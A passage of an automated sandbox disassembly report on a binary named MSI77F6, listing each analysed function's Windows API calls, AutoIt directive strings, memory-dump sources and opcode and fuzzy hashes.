                                        • Snapshot File: hcaresult_3_2_770000_MSI77F6.jbxd
                                        Similarity
                                        • API ID: BuffCharConnectRegistryUpper_memmove
                                        • String ID:
                                        • API String ID: 3479070676-0
                                        • Opcode ID: bec8c469f94f8fa3b976341a1136f26a91596a6200788639a766d6c8b695c98d
                                        • Instruction ID: e1fce24a3715fd91962d5e896a688d203b429e36d51f4e181b99c57eee1fef95
                                        • Opcode Fuzzy Hash: bec8c469f94f8fa3b976341a1136f26a91596a6200788639a766d6c8b695c98d
                                        • Instruction Fuzzy Hash: FA915871204201EFCB11EF14C895B6EB7F5AF98310F14844EF59A972A2EB78ED46CB52
                                        Function 007C9A66 Relevance: 12.2, APIs: 8, Instructions: 247networkCOMMON
                                        Download Yara Rule
                                        APIs
                                        • select.WS2_32 ref: 007C9B38
                                        • WSAGetLastError.WS2_32(00000000), ref: 007C9B45
                                        • __WSAFDIsSet.WS2_32(00000000,?), ref: 007C9B6F
                                        • WSAGetLastError.WS2_32(00000000), ref: 007C9B9F
                                        • htons.WS2_32(?), ref: 007C9C51
                                        • inet_ntoa.WS2_32(?), ref: 007C9C0C
                                          • Part of subcall function 007AE0F5: _strlen.LIBCMT ref: 007AE0FF
                                          • Part of subcall function 007AE0F5: _memmove.LIBCMT ref: 007AE121
                                        • _strlen.LIBCMT ref: 007C9CA7
                                        • _memmove.LIBCMT ref: 007C9D10
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.3414588859.0000000000771000.00000040.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                        • Associated: 00000003.00000002.3414495168.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000081E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000082A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000084C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.00000000008D4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3415003312.00000000008DA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3415045668.00000000008DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_770000_MSI77F6.jbxd
                                        Similarity
                                        • API ID: ErrorLast_memmove_strlen$htonsinet_ntoaselect
                                        • String ID:
                                        • API String ID: 3637404534-0
                                        • Opcode ID: 4f1d5289fa28ea09a9bf0d18507f2a5fb196bebacb61c196aebc544f581f892f
                                        • Instruction ID: 1dcfc65bb28e7d610441e8920b3a95ca75eb53f9bdca5063d8e2f4902a2897f7
                                        • Opcode Fuzzy Hash: 4f1d5289fa28ea09a9bf0d18507f2a5fb196bebacb61c196aebc544f581f892f
                                        • Instruction Fuzzy Hash: 4C81A071504240EBCB20EF64CC49F6BB7E8EB89714F10861DF6599B291DB78DD04CBA2
                                        Function 0079B72C Relevance: 12.1, APIs: 8, Instructions: 118COMMONLIBRARYCODE
                                        Download Yara Rule
                                        APIs
                                        • __mtinitlocknum.LIBCMT ref: 0079B744
                                          • Part of subcall function 00798A0C: __FF_MSGBANNER.LIBCMT ref: 00798A21
                                          • Part of subcall function 00798A0C: __NMSG_WRITE.LIBCMT ref: 00798A28
                                          • Part of subcall function 00798A0C: __malloc_crt.LIBCMT ref: 00798A48
                                        • __lock.LIBCMT ref: 0079B757
                                        • __lock.LIBCMT ref: 0079B7A3
                                        • InitializeCriticalSectionAndSpinCount.KERNEL32(8000000C,00000FA0,00826948,00000018,007A6C2B,?,00000000,00000109), ref: 0079B7BF
                                        • RtlEnterCriticalSection.NTDLL(8000000C), ref: 0079B7DC
                                        • RtlLeaveCriticalSection.NTDLL(8000000C), ref: 0079B7EC
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.3414588859.0000000000771000.00000040.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                        • Associated: 00000003.00000002.3414495168.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000081E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000082A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000084C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.00000000008D4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3415003312.00000000008DA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3415045668.00000000008DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_770000_MSI77F6.jbxd
                                        Similarity
                                        • API ID: CriticalSection$__lock$CountEnterInitializeLeaveSpin__malloc_crt__mtinitlocknum
                                        • String ID:
                                        • API String ID: 1422805418-0
                                        • Opcode ID: ab45c6ec3e027602f4fc53a80ee3a40d8ef1c440c2914a627e94a1dd95a57206
                                        • Instruction ID: 03c95764d5553da53f5d7fbd05fb2c60685589f09e474f59669075e27967661b
                                        • Opcode Fuzzy Hash: ab45c6ec3e027602f4fc53a80ee3a40d8ef1c440c2914a627e94a1dd95a57206
                                        • Instruction Fuzzy Hash: D3410271910215CBEF10DFA8FA897A8BBA4BF45335F108319E825AB2D1D77CA841CBD5
                                        Function 007BA1B7 Relevance: 12.1, APIs: 8, Instructions: 100fileCOMMON
                                        Download Yara Rule
                                        APIs
                                        • InterlockedExchange.KERNEL32(?,000001F5), ref: 007BA1CE
                                          • Part of subcall function 0079010A: std::exception::exception.LIBCMT ref: 0079013E
                                          • Part of subcall function 0079010A: __CxxThrowException@8.LIBCMT ref: 00790153
                                        • ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,?,00000000), ref: 007BA205
                                        • RtlEnterCriticalSection.NTDLL(?), ref: 007BA221
                                        • _memmove.LIBCMT ref: 007BA26F
                                        • _memmove.LIBCMT ref: 007BA28C
                                        • RtlLeaveCriticalSection.NTDLL(?), ref: 007BA29B
                                        • ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,00000000,00000000), ref: 007BA2B0
                                        • InterlockedExchange.KERNEL32(?,000001F6), ref: 007BA2CF
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.3414588859.0000000000771000.00000040.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                        • Associated: 00000003.00000002.3414495168.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000081E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000082A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000084C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.00000000008D4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3415003312.00000000008DA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3415045668.00000000008DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_770000_MSI77F6.jbxd
                                        Similarity
                                        • API ID: CriticalExchangeFileInterlockedReadSection_memmove$EnterException@8LeaveThrowstd::exception::exception
                                        • String ID:
                                        • API String ID: 256516436-0
                                        • Opcode ID: e306234f63dc61ccd7c1419be988a854f4d9496a34cf49ffdd4115202257ad6c
                                        • Instruction ID: 08f5bb221286ae3ac227511a02f78eeae51473779a8de24202e087457142738b
                                        • Opcode Fuzzy Hash: e306234f63dc61ccd7c1419be988a854f4d9496a34cf49ffdd4115202257ad6c
                                        • Instruction Fuzzy Hash: 6F319231900105EFCF10EF95DC89AAEB7B9FF85310B1480A5F904AB256D778DD15CBA5
                                        Function 007D8CDB Relevance: 12.1, APIs: 8, Instructions: 95windowCOMMON
                                        Download Yara Rule
                                        APIs
                                        • DeleteObject.GDI32(00000000), ref: 007D8CF3
                                        • GetDC.USER32(00000000), ref: 007D8CFB
                                        • GetDeviceCaps.GDI32(00000000,0000005A), ref: 007D8D06
                                        • ReleaseDC.USER32(00000000,00000000), ref: 007D8D12
                                        • CreateFontW.GDI32(?,00000000,00000000,00000000,00000000,?,?,?,00000001,00000004,00000000,?,00000000,?), ref: 007D8D4E
                                        • SendMessageW.USER32(?,00000030,00000000,00000001), ref: 007D8D5F
                                        • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,007DBB29,?,?,000000FF,00000000,?,000000FF,?), ref: 007D8D99
                                        • SendMessageW.USER32(?,00000142,00000000,00000000), ref: 007D8DB9
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.3414588859.0000000000771000.00000040.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                        • Associated: 00000003.00000002.3414495168.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000081E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000082A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000084C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.00000000008D4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3415003312.00000000008DA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3415045668.00000000008DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_770000_MSI77F6.jbxd
                                        Similarity
                                        • API ID: MessageSend$CapsCreateDeleteDeviceFontMoveObjectReleaseWindow
                                        • String ID:
                                        • API String ID: 3864802216-0
                                        • Opcode ID: 1c3fc6a2d1557faad76cfe3f5dd79f8cc52d148e4aac3bbc69e4fc08256af57f
                                        • Instruction ID: bbcf97b600ffc4e130c475eb6b79dfc305bbbe1901ec6821685b2abae0a428d3
                                        • Opcode Fuzzy Hash: 1c3fc6a2d1557faad76cfe3f5dd79f8cc52d148e4aac3bbc69e4fc08256af57f
                                        • Instruction Fuzzy Hash: BB315A72201214BBEB208F508C8AFEA3BAAEF49755F048055FE08DA291DA799C41CB74
                                        Function 0078B40F Relevance: 10.7, APIs: 7, Instructions: 218COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.3414588859.0000000000771000.00000040.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                        • Associated: 00000003.00000002.3414495168.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000081E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000082A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000084C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.00000000008D4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3415003312.00000000008DA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3415045668.00000000008DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_770000_MSI77F6.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 5dc771a00f4e94e2608bed825416467a63151a12322f6097c571991b7ef675b4
                                        • Instruction ID: 8ac53090637913f19fe92f4e01e98c55ef3257ffb163e5a5ec0c44c4e1fcb6c7
                                        • Opcode Fuzzy Hash: 5dc771a00f4e94e2608bed825416467a63151a12322f6097c571991b7ef675b4
                                        • Instruction Fuzzy Hash: 7B716C71900149EFCB14DF98CC89EBEBF79FF89314F248159F915AA251C7389A12CB64
                                        Function 007D2121 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 191COMMON
                                        Download Yara Rule
                                        APIs
                                        • _memset.LIBCMT ref: 007D214B
                                        • _memset.LIBCMT ref: 007D2214
                                        • ShellExecuteExW.SHELL32(?), ref: 007D2259
                                          • Part of subcall function 007784A6: __swprintf.LIBCMT ref: 007784E5
                                          • Part of subcall function 007784A6: __itow.LIBCMT ref: 00778519
                                          • Part of subcall function 00773BCF: _wcscpy.LIBCMT ref: 00773BF2
                                        • CloseHandle.KERNEL32(00000000), ref: 007D2320
                                        • FreeLibrary.KERNEL32(00000000), ref: 007D232F
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.3414588859.0000000000771000.00000040.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                        • Associated: 00000003.00000002.3414495168.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000081E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000082A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000084C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.00000000008D4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3415003312.00000000008DA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3415045668.00000000008DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_770000_MSI77F6.jbxd
                                        Similarity
                                        • API ID: _memset$CloseExecuteFreeHandleLibraryShell__itow__swprintf_wcscpy
                                        • String ID: @
                                        • API String ID: 4082843840-2766056989
                                        • Opcode ID: 18c2846ec1fdd0c796c900d048376dbcc492a7e1b990a9df4588a5f7b0a015c5
                                        • Instruction ID: 52bc08cae3269408d875030b501f383457c75270bbac2606d6e7d0e0266c7107
                                        • Opcode Fuzzy Hash: 18c2846ec1fdd0c796c900d048376dbcc492a7e1b990a9df4588a5f7b0a015c5
                                        • Instruction Fuzzy Hash: 74718171A00619DFCF15EFA4C99999EB7F5FF48310F10805AE859AB352DB38AD42CB90
                                        Function 007B47DE Relevance: 10.7, APIs: 7, Instructions: 165windowCOMMON
                                        Download Yara Rule
                                        APIs
                                        • GetParent.USER32(?), ref: 007B481D
                                        • GetKeyboardState.USER32(?), ref: 007B4832
                                        • SetKeyboardState.USER32(?), ref: 007B4893
                                        • PostMessageW.USER32(?,00000101,00000010,?), ref: 007B48C1
                                        • PostMessageW.USER32(?,00000101,00000011,?), ref: 007B48E0
                                        • PostMessageW.USER32(?,00000101,00000012,?), ref: 007B4926
                                        • PostMessageW.USER32(?,00000101,0000005B,?), ref: 007B4949
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.3414588859.0000000000771000.00000040.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                        • Associated: 00000003.00000002.3414495168.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000081E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000082A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000084C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.00000000008D4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3415003312.00000000008DA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3415045668.00000000008DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_770000_MSI77F6.jbxd
                                        Similarity
                                        • API ID: MessagePost$KeyboardState$Parent
                                        • String ID:
                                        • API String ID: 87235514-0
                                        • Opcode ID: 55ee840a12d8f1c6f886552f894b843a66882764d983c5675f3a262de3fe98ef
                                        • Instruction ID: 1193de5f3852905c160284f19986b2e8f88ec98b36d7718a906979b0d5195a27
                                        • Opcode Fuzzy Hash: 55ee840a12d8f1c6f886552f894b843a66882764d983c5675f3a262de3fe98ef
                                        • Instruction Fuzzy Hash: A051B1A0A087D57DFB3646348C49BFBBFA96B06304F088589E1D5568C3C6DCEC98DB51
                                        Function 007B45F9 Relevance: 10.7, APIs: 7, Instructions: 164windowCOMMON
                                        Download Yara Rule
                                        APIs
                                        • GetParent.USER32(00000000), ref: 007B4638
                                        • GetKeyboardState.USER32(?), ref: 007B464D
                                        • SetKeyboardState.USER32(?), ref: 007B46AE
                                        • PostMessageW.USER32(00000000,00000100,00000010,?), ref: 007B46DA
                                        • PostMessageW.USER32(00000000,00000100,00000011,?), ref: 007B46F7
                                        • PostMessageW.USER32(00000000,00000100,00000012,?), ref: 007B473B
                                        • PostMessageW.USER32(00000000,00000100,0000005B,?), ref: 007B475C
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.3414588859.0000000000771000.00000040.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                        • Associated: 00000003.00000002.3414495168.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000081E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000082A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000084C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.00000000008D4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3415003312.00000000008DA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3415045668.00000000008DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_770000_MSI77F6.jbxd
                                        Similarity
                                        • API ID: MessagePost$KeyboardState$Parent
                                        • String ID:
                                        • API String ID: 87235514-0
                                        • Opcode ID: ee8081f3a0c50b5024371f1966b6dc4e7f0e2960b61343457b5f91bbb81dfc29
                                        • Instruction ID: 2e9d211ffc534dbc600b2f4c7e925225f56e9ae51fa82418d02555866a21dfeb
                                        • Opcode Fuzzy Hash: ee8081f3a0c50b5024371f1966b6dc4e7f0e2960b61343457b5f91bbb81dfc29
                                        • Instruction Fuzzy Hash: C051D4A05047D67DFB3687248C55BF6BFA96B07304F088489E1D5868C3D79CEC98D751
                                        Function 007B86AE Relevance: 10.6, APIs: 7, Instructions: 137timeCOMMON
                                        Download Yara Rule
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.3414588859.0000000000771000.00000040.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                        • Associated: 00000003.00000002.3414495168.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000081E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000082A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000084C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.00000000008D4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3415003312.00000000008DA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3415045668.00000000008DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_770000_MSI77F6.jbxd
                                        Similarity
                                        • API ID: _wcsncpy$LocalTime
                                        • String ID:
                                        • API String ID: 2945705084-0
                                        • Opcode ID: 4b7aeb5e638973813abfd653e6ad16636a486c5bd5ee9de251401dedf9729015
                                        • Instruction ID: 370fe05a3ee93e983b6bff1972b1dc7abbed423e6aa5f5f0063d7a198f1cd5f7
                                        • Opcode Fuzzy Hash: 4b7aeb5e638973813abfd653e6ad16636a486c5bd5ee9de251401dedf9729015
                                        • Instruction Fuzzy Hash: C1412F65D10214B6CF51FBF4D88AACEB7ACAF05310F508466E514F3122EA38E655C7E6
                                        Function 007D8DD5 Relevance: 10.6, APIs: 7, Instructions: 99windowCOMMON
                                        Download Yara Rule
                                        APIs
                                        • SendMessageW.USER32(?,000000F0,00000000,00000000), ref: 007D8DF4
                                        • GetWindowLongW.USER32(01769018,000000F0), ref: 007D8E27
                                        • GetWindowLongW.USER32(01769018,000000F0), ref: 007D8E5C
                                        • SendMessageW.USER32(?,000000F1,00000000,00000000), ref: 007D8E8E
                                        • SendMessageW.USER32(?,000000F1,00000001,00000000), ref: 007D8EB8
                                        • GetWindowLongW.USER32(?,000000F0), ref: 007D8EC9
                                        • SetWindowLongW.USER32(?,000000F0,00000000), ref: 007D8EE3
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.3414588859.0000000000771000.00000040.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                        • Associated: 00000003.00000002.3414495168.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000081E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000082A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000084C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.00000000008D4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3415003312.00000000008DA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3415045668.00000000008DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_770000_MSI77F6.jbxd
                                        Similarity
                                        • API ID: LongWindow$MessageSend
                                        • String ID:
                                        • API String ID: 2178440468-0
                                        • Opcode ID: f8f7914878e0186cea9033ad265e32ed7fa36e6a40f17db69e61057efcd77eb9
                                        • Instruction ID: d422924078c75beb953c3211d06d16360c58f7b1169d8a911f37e6f00288a0e9
                                        • Opcode Fuzzy Hash: f8f7914878e0186cea9033ad265e32ed7fa36e6a40f17db69e61057efcd77eb9
                                        • Instruction Fuzzy Hash: 24310031204210EFDB61DF58DC88F6537B6FB8AB54F1941A6F5058B2B2CB69AC40DF46
                                        Function 007B16F1 Relevance: 10.6, APIs: 7, Instructions: 94memoryCOMMON
                                        Download Yara Rule
                                        APIs
                                        • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 007B1734
                                        • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 007B175A
                                        • SysAllocString.OLEAUT32(00000000), ref: 007B175D
                                        • SysAllocString.OLEAUT32(?), ref: 007B177B
                                        • SysFreeString.OLEAUT32(?), ref: 007B1784
                                        • StringFromGUID2.COMBASE(?,?,00000028), ref: 007B17A9
                                        • SysAllocString.OLEAUT32(?), ref: 007B17B7
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.3414588859.0000000000771000.00000040.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                        • Associated: 00000003.00000002.3414495168.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000081E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000082A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000084C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.00000000008D4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3415003312.00000000008DA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3415045668.00000000008DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_770000_MSI77F6.jbxd
                                        Similarity
                                        • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                        • String ID:
                                        • API String ID: 3761583154-0
                                        • Opcode ID: 128374e8734e2676b486b4c4b013fd490c8881a048f6da570abbe6a6da322bf5
                                        • Instruction ID: b2001457bbe19528097aca1304abc1d13d9321d76a746f7b466522e69367b772
                                        • Opcode Fuzzy Hash: 128374e8734e2676b486b4c4b013fd490c8881a048f6da570abbe6a6da322bf5
                                        • Instruction Fuzzy Hash: 72216275600219AF9B10DBA8DC98DFF73EDEB09360B908125F915DB290EB78EC4187A4
                                        Function 007B69F9 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 93filestringCOMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 007731B8: GetFullPathNameW.KERNEL32(00000000,00000104,?,?), ref: 007731DA
                                        • lstrcmpiW.KERNEL32(?,?), ref: 007B6A2B
                                        • _wcscmp.LIBCMT ref: 007B6A49
                                        • MoveFileW.KERNEL32(?,?), ref: 007B6A62
                                          • Part of subcall function 007B6D6D: GetFileAttributesW.KERNEL32(?,?,00000000), ref: 007B6DBA
                                          • Part of subcall function 007B6D6D: GetLastError.KERNEL32 ref: 007B6DC5
                                          • Part of subcall function 007B6D6D: CreateDirectoryW.KERNEL32(?,00000000), ref: 007B6DD9
                                        • _wcscat.LIBCMT ref: 007B6AA4
                                        • SHFileOperationW.SHELL32(?), ref: 007B6B0C
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.3414588859.0000000000771000.00000040.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                        • Associated: 00000003.00000002.3414495168.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000081E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000082A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000084C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.00000000008D4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3415003312.00000000008DA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3415045668.00000000008DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_770000_MSI77F6.jbxd
                                        Similarity
                                        • API ID: File$AttributesCreateDirectoryErrorFullLastMoveNameOperationPath_wcscat_wcscmplstrcmpi
                                        • String ID: \*.*
                                        • API String ID: 2323102230-1173974218
                                        • Opcode ID: 27f68537505a4fc690650fadf72f3ffb4f4eb5022ebe1ba352f712eac292f48f
                                        • Instruction ID: 279a54ffd9d21aee63fffd7213e6b466a0e84490df5abd22b55b4ed871e03552
                                        • Opcode Fuzzy Hash: 27f68537505a4fc690650fadf72f3ffb4f4eb5022ebe1ba352f712eac292f48f
                                        • Instruction Fuzzy Hash: E4312A71900219AACF51EFB4E849BDDB7B8AF08340F5085EAE505E3141EB389B49CF64
                                        Function 007B2FCD Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 90COMMON
                                        Download Yara Rule
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.3414588859.0000000000771000.00000040.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                        • Associated: 00000003.00000002.3414495168.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000081E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000082A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000084C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.00000000008D4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3415003312.00000000008DA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3415045668.00000000008DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_770000_MSI77F6.jbxd
                                        Similarity
                                        • API ID: __wcsnicmp
                                        • String ID: #OnAutoItStartRegister$#notrayicon$#requireadmin
                                        • API String ID: 1038674560-2734436370
                                        • Opcode ID: d2061eb2ce8286e3e08d3eade8dd96252e215fb486084d050d18b86f0bf117c6
                                        • Instruction ID: eddf4079302834d53e77f63eaca0238a0db2fa46ecbf744b0e520823a62262b1
                                        • Opcode Fuzzy Hash: d2061eb2ce8286e3e08d3eade8dd96252e215fb486084d050d18b86f0bf117c6
                                        • Instruction Fuzzy Hash: 71210732245611FAD631B634AC0AFFB73A9DF55350F104025F45587292EB9D9E82D391
                                        Function 007B17C8 Relevance: 10.6, APIs: 7, Instructions: 89memoryCOMMON
                                        Download Yara Rule
                                        APIs
                                        • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 007B180D
